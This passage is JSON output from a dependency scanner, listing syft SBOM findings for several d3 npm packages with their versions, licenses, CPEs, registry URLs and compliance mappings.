"SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-color 3.1.0", "title": "d3-color 3.1.0", "description": "Package discovered: d3-color 3.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "633ef642a5395c1a", "name": "d3-color", "version": "3.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-color:d3-color:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-color:d3_color:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_color:d3-color:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_color:d3_color:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-color:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_color:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-color@3.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-color/-/d3-color-3.1.0.tgz", "integrity": "sha512-zg/chbXyeBtMQ1LbD/WSoW2DpC3I0mpmPdW+ynRTj/x2DAWYrIY7qeZIHidozwV24m4iavr15lNwIwLxRmOxhA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d9ebb131f790b372", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-ease 3.0.1", "title": "d3-ease 3.0.1", "description": "Package discovered: d3-ease 3.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5c5a953bcb066b0e", "name": "d3-ease", "version": "3.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-3-Clause", "spdxExpression": "BSD-3-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-ease:d3-ease:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-ease:d3_ease:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_ease:d3-ease:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_ease:d3_ease:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-ease:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_ease:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-ease@3.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-ease/-/d3-ease-3.0.1.tgz", "integrity": "sha512-wR/XK3D3XcLIZwpbvQwQ5fK+8Ykds1ip7A2Txe0yxncXSdq1L9skcG7blcedkOX+ZcgxGAmLX1FrRGbADwzi0w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fe1c10f297b89c50", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-format 3.1.2", "title": "d3-format 3.1.2", "description": "Package discovered: d3-format 3.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5199669646af57ab", "name": "d3-format", "version": "3.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-format:d3-format:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-format:d3_format:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_format:d3-format:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_format:d3_format:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-format:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_format:3.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-format@3.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-format/-/d3-format-3.1.2.tgz", "integrity": "sha512-AJDdYOdnyRDV5b6ArilzCPPwc1ejkHcoyFarqlPqT7zRYjhavcT3uSrqcMvsgh2CgoPbK3RCwyHaVyxYcP2Arg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d580ebf8b65eecc5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-interpolate 3.0.1", "title": "d3-interpolate 3.0.1", "description": "Package discovered: d3-interpolate 3.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2bcd6b2445ac379d", "name": "d3-interpolate", "version": "3.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_interpolate:d3-interpolate:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_interpolate:d3_interpolate:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-interpolate:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_interpolate:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-interpolate@3.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-interpolate/-/d3-interpolate-3.0.1.tgz", "integrity": "sha512-3bYs1rOD33uo8aqJfKP3JWPAibgw8Zm2+L9vBKEHJ2Rg+viTR7o5Mmv5mZcieN+FRYaAOWX5SJATX6k1PWz72g==", "dependencies": { "d3-color": "1 - 3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9d53314d3544b04e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-path 3.1.0", "title": "d3-path 3.1.0", "description": "Package discovered: d3-path 3.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "63d3c4d24d9be1d5", "name": "d3-path", "version": "3.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-path:d3-path:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-path:d3_path:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_path:d3-path:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_path:d3_path:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-path:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_path:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-path@3.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-path/-/d3-path-3.1.0.tgz", "integrity": "sha512-p3KP5HCf/bvjBSSKuXid6Zqijx7wIfNW+J/maPs+iwR35at5JCbLUT0LzF1cnjbCHWhqzQTIN2Jpe8pRebIEFQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "964951e667c4c379", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-scale 4.0.2", "title": "d3-scale 4.0.2", "description": "Package discovered: d3-scale 4.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6f08c8eb1953f0ad", "name": "d3-scale", "version": "4.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-scale:d3-scale:4.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-scale:d3_scale:4.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_scale:d3-scale:4.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_scale:d3_scale:4.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-scale:4.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_scale:4.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-scale@4.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-scale/-/d3-scale-4.0.2.tgz", "integrity": "sha512-GZW464g1SH7ag3Y7hXjf8RoUuAFIqklOAq3MRl4OaWabTFJY9PN/E1YklhXLh+OQ3fM9yS2nOkCoS+WLZ6kvxQ==", "dependencies": { "d3-array": "2.10.0 - 3", "d3-format": "1 - 3", "d3-interpolate": "1.2.0 - 3", "d3-time": "2.1.1 - 3", "d3-time-format": "2 - 4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fdbd8e26e660bbf2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-shape 3.2.0", "title": "d3-shape 3.2.0", "description": "Package discovered: d3-shape 3.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "62919ef646dbae92", "name": "d3-shape", "version": "3.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-shape:d3-shape:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-shape:d3_shape:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_shape:d3-shape:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_shape:d3_shape:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-shape:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_shape:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-shape@3.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-shape/-/d3-shape-3.2.0.tgz", "integrity": "sha512-SaLBuwGm3MOViRq2ABk3eLoxwZELpH6zhl3FbAoJ7Vm1gofKx6El1Ib5z23NUEhF9AsGl7y+dzLe5Cw2AArGTA==", "dependencies": { "d3-path": "^3.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "53764226f7fa140f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-time 3.1.0", "title": "d3-time 3.1.0", "description": "Package discovered: d3-time 3.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "809edf0f6cbf0d31", "name": "d3-time", "version": "3.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-time:d3-time:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-time:d3_time:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_time:d3-time:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_time:d3_time:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-time:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_time:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-time@3.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-time/-/d3-time-3.1.0.tgz", "integrity": "sha512-VqKjzBLejbSMT4IgbmVgDjpkYrNWUYJnbCGo874u7MMKIWsILRX+OpX/gTk8MqjpT1A/c6HY2dCA77ZN0lkQ2Q==", "dependencies": { "d3-array": "2 - 3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e86c38bd447bf3a0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-time-format 4.1.0", "title": "d3-time-format 4.1.0", "description": "Package discovered: d3-time-format 4.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4c75f293b12c6086", "name": "d3-time-format", "version": "4.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-time-format:d3-time-format:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-time-format:d3_time_format:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_time_format:d3-time-format:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_time_format:d3_time_format:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-time:d3-time-format:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-time:d3_time_format:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_time:d3-time-format:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_time:d3_time_format:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-time-format:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_time_format:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-time-format@4.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-time-format/-/d3-time-format-4.1.0.tgz", "integrity": 